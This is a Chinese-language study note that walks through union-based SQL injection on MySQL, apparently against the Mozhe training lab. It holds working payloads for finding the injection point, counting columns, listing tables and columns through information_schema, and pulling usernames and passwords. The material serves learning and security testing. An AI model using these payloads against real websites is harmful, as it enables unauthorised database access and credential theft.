必要知识点:
在Mysql5.0以上版本中,mysql存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。
数据库中符号“.”代表下一级,如adb.user表示adb数据库下的user表名
Information_schema.tables:记录所有表名信息的表
Information_schema.columns:记录所有列名信息的表
Information_schema.schemata:记录所有数据库名称的表
查询条件:
Table_name:表名
Column_name:列名
Table_schema:数据库名
判断注入点:
And 且运算
Or 或运算
Xor 非运算符
1、id=1 and 1=1 真 页面正常
1=1 真且真=真
2、id=1 and 1=2 假 页面错误
1=2 真且假=假
总结:id=1后面随便加字母或字符加载页面错误判断为有变量,可以进行sql注入,sql注入就是把修改变量为自己想要的查询语句传递到数据库,查询自己想要的信息
信息收集
数据库版本:version() 5.7.22-0ubuntu0.16.04.1
数据库名字:database() mozhe_Discuz_StormGroup
数据库用户:user() root@localhost
操作系统:@@version_compile_os Linux
高版本查询:
猜解列名数量(查询数据库有多少列)
Order by x(x为数值变量,错误与正常的值,超出列数则报错)
报错猜解准备
例:id=-1(另前面id=1失效)union select 1,2,3,4(前面猜解列数数量)
查询指定数据库下的表名信息
例:id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
查询指定表名下的列名信息:
id=-1(另前面id=1失效)union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='x(x为查询数据库名称)'
例:id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup'
查询指定数据
例:id=-1(另前面id=1失效)union select 1,(写入查询到的列名),3,4 form (写入查询到的表名)
注:如果查询数据有两条在后面加入limit 1,1变动猜解
例:id=-1 union select 1,name,password,4 from StormGroup_member limit x(x为数据有多少条)